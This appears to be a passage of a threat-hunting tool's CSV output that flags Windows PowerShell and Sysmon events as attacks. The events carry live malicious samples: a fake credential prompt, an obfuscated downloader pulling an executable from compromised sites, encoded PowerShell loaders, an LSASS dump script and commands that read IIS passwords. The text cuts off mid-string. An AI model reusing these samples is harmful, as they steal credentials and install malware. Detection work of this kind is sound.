PowerShell tries to dump a 64-bit process. + Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue + + throw $ExceptionMessage + } + else + { + "Memdump complete!" + } + +} + 27f08bda-c330-419f-b83b-eb5c0f699930 + C:\Users\Public\lsass_wer_ps.ps1 + +",MSEDGEWIN10,Microsoft-Windows-PowerShell/Operational +powershell script block - Found Suspicious PowerShell commands ,1568036117.258414,2019-09-09T17:35:17.258414+04:00,,Threat,Critical,"Found Suspicious PowerShell commands that include (Password,New-Object,New-Object,$env:UserName,add,invoke,new-object,.pass,PromptForCredential,select-object,System.DirectoryServices.AccountManagement) , check event details ",4104," + + + + + 4104 + 1 + 3 + 2 + 15 + 0x0 + + + 1123 + + + + + Microsoft-Windows-PowerShell/Operational + MSEDGEWIN10 + + + + + 1 + 1 + function Invoke-LoginPrompt{ +$cred = $Host.ui.PromptForCredential("Windows Security", "Please enter user credentials", "$env:userdomain\$env:username","") +$username = "$env:username" +$domain = "$env:userdomain" +$full = "$domain" + "\" + "$username" +$password = $cred.GetNetworkCredential().password +Add-Type -assemblyname System.DirectoryServices.AccountManagement +$DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) +while($DS.ValidateCredentials("$full","$password") -ne $True){ + $cred = $Host.ui.PromptForCredential("Windows Security", "Invalid Credentials, Please try again", "$env:userdomain\$env:username","") + $username = "$env:username" + $domain = "$env:userdomain" + $full = "$domain" + "\" + "$username" + $password = $cred.GetNetworkCredential().password + Add-Type -assemblyname System.DirectoryServices.AccountManagement + $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) + $DS.ValidateCredentials("$full", "$password") | out-null + } + $output = $newcred = $cred.GetNetworkCredential() | select-object UserName, Domain, Password + $output + R{START_PROCESS} +} +Invoke-LoginPrompt + c7ca7056-b317-4fff-b796-05d8ef896dcd + + +",MSEDGEWIN10,Microsoft-Windows-PowerShell/Operational +powershell script block - Found Suspicious PowerShell commands ,1598418568.845521,2020-08-26T09:09:28.845521+04:00,,Threat,Critical,"Found Suspicious PowerShell commands that include (Net.WebClient,Net.WebClient,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,Net.WebClient) , check event details ",4104," + + + + + 4104 + 1 + 5 + 2 + 15 + 0x0 + + + 683 + + + + + Microsoft-Windows-PowerShell/Operational + DESKTOP-RIPCLIP + + + + + 1 + 1 + $Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0') + fdd51159-9602-40cb-839d-c31039ebbc3a + + +",DESKTOP-RIPCLIP,Microsoft-Windows-PowerShell/Operational +powershell script block - Found Suspicious PowerShell commands ,1568036109.31523,2019-09-09T17:35:09.315230+04:00,,Threat,Critical,"Found Suspicious PowerShell commands that include (FromBase64String,Base64,New-Object,New-Object,new-object,readtoend,system.io.streamreader) , check event details ",4104," + + + + + 4104 + 1 + 3 + 2 + 15 + 0x0 + + + 1122 + + + + + Microsoft-Windows-PowerShell/Operational + MSEDGEWIN10 + + + + + 1 + 1 + &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAAlVdl0CA81UXW/aMBR996+4svJANJIfgNQHBNs6aaWIsO2hnSbXuaVeEzuyHdKI8d93YwIDTUJlfVkeLPme+3F87lEeay29Mho+6bV5xuSzWSk9t6as/IZF0mIOVxBdG+fTWqU74IOxEwJQeyWKAf+mdG4aBxnK2irf8iHweYHCIVAKWqgdHfJQ4bqECPV61AG5KYXS94e7FiXyIecxi/ZXYsBPcRbtyk6QXYiwx7ooAtJH4B3w+3BGRx0q4VxjbHhfRy79iH6GnkLPR6+L030eG+d5smwrhIQiWD4UbSCXtc5jmU6VRemNbTO0ayXRpWMpTa39jdBihSX1Y9E0o2kzbJLbh5+UfUEtSa+0VJUoJoZEffGDuwuK+5qO/ffR6EbIJ6UxZs2TKnBArNKvolC58Pjn5W7Ag5C0i4NUPIZEI0RLW2O8YUDfv1uEDNcNhaORQ+h9420LYtXt7nVWCUzO2CXgZywT8FfZJmRebJ2u6u32CbP/Mwv1nM4aCE4c9AtM7RNNSCjeMogoUNW+U1NjszfUGWGph8OCKCdmJ8IX2s+M1BzCNOyOjHSQvu/OYLHJluPF8sd8cTt5n2VbtmV///R+A6HMO3IQBQAA'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) + 37f6d110-cfdf-4118-8748-17638e258531 + + +",MSEDGEWIN10,Microsoft-Windows-PowerShell/Operational +[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 2164892 + + + + + Microsoft-Windows-Sysmon/Operational + LAPTOP-JU4M3I0E + + + + + + 2020-10-05 20:43:58.450 + 00247C92-858E-5F7B-0000-0010E741202B + 6636 + C:\Windows\System32\cmd.exe + 10.0.18362.449 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe + C:\windows\ + LAPTOP-JU4M3I0E\bouss + 00247C92-8C36-5F75-0000-002034E39103 + 0x391e334 + 2 + High + SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 00247C92-858E-5F7B-0000-00105241202B + 18404 + C:\Windows\System32\Taskmgr.exe + C:\windows\system32\taskmgr.exe + +",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1556808617.955524,2019-05-02T18:50:17.955524+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( IEWIN7.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.36.133 ) and port ( 443 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 10272 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-02 14:48:51.664 + 365ABB72-0244-5CCB-0000-00109AE70B00 + 1508 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + IEWIN7\IEUser + tcp + true + false + 10.0.2.15 + IEWIN7.home + 49178 + + false + 151.101.36.133 + + 443 + https + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 339891 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-08-02 16:24:28.637 + 747F3D96-E8BC-5F26-0000-0010F7C41A00 + 588 + C:\Windows\System32\whoami.exe + 10.0.17763.1 (WinBuild.160101.0800) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami.exe + whoami + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-E308-5F26-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 + 747F3D96-E8BA-5F26-0000-001035BE1A00 + 8104 + C:\Windows\System32\cmd.exe + "c:\windows\system32\cmd.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1619129375.284604,2021-04-23T02:09:35.284604+04:00,,Threat,Low,Found User (NT AUTHORITY\LOCAL SERVICE) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 564605 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2021-04-22 22:09:35.263 + 747F3D96-F41F-6081-0000-001078834A00 + 6644 + C:\Windows\System32\svchost.exe + 10.0.17763.1 (WinBuild.160101.0800) + Host Process for Windows Services + Microsoft® Windows® Operating System + Microsoft Corporation + svchost.exe + C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost + C:\Windows\system32\ + NT AUTHORITY\LOCAL SERVICE + 747F3D96-6E1A-6082-0000-0020E5030000 + 0x3e5 + 0 + System + SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69 + 00000000-0000-0000-0000-000000000000 + 624 + ? + ? + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1596385468.64099,2020-08-02T20:24:28.640990+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( "c:\windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 339890 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-08-02 16:24:26.803 + 747F3D96-E8BA-5F26-0000-001035BE1A00 + 8104 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "c:\windows\system32\cmd.exe" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-E308-5F26-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-E309-5F26-0000-0010137B0000 + 820 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k DcomLaunch -p + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1003 ] Credential Dumping ImageLoad,1555606895.720774,2019-04-18T21:01:35.720774+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 29 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 17:01:35.680 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\vaultcli.dll + 6.1.7600.16385 (win7_rtm.090713-1255) + Credential Vault Client Library + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56 + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606895.720774,2019-04-18T21:01:35.720774+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 29 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 17:01:35.680 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\vaultcli.dll + 6.1.7600.16385 (win7_rtm.090713-1255) + Credential Vault Client Library + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56 + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920557.731362,2019-05-27T05:29:17.731362+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Filename: redirection.config" /text:processmodel.password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5898 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:17.691 + 365ABB72-3D6D-5CEB-0000-00104474FF00 + 2448 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Filename: redirection.config" /text:processmodel.password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1003.001] Credential dump Thread Open to Lsass,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,Process ( \\VBOXSVR\HTools\voice_mail.msg.exe) attempted to access lsass process ( C:\Windows\System32\lsass.exe),8," + + + + + 8 + 2 + 4 + 8 + 0 + 0x8000000000000000 + + + 9066 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 12:43:43.784 + 365ABB72-4055-5CC8-0000-0010769D0B00 + 1532 + \\VBOXSVR\HTools\voice_mail.msg.exe + 365ABB72-3FE0-5CC8-0000-00107E590000 + 492 + C:\Windows\System32\lsass.exe + 3656 + 0x001A0000 + + + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766825.425419,2020-03-21T09:00:25.425419+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243552 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.397 + 747F3D96-9F69-5E75-0000-001033922000 + 6572 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.425419,2020-03-21T09:00:25.425419+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243552 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.397 + 747F3D96-9F69-5E75-0000-001033922000 + 6572 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920557.661261,2019-05-27T05:29:17.661261+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Filename: redirection.config" /text:processmodel.username ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5895 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:17.621 + 365ABB72-3D6D-5CEB-0000-00108270FF00 + 1340 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Filename: redirection.config" /text:processmodel.username + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdA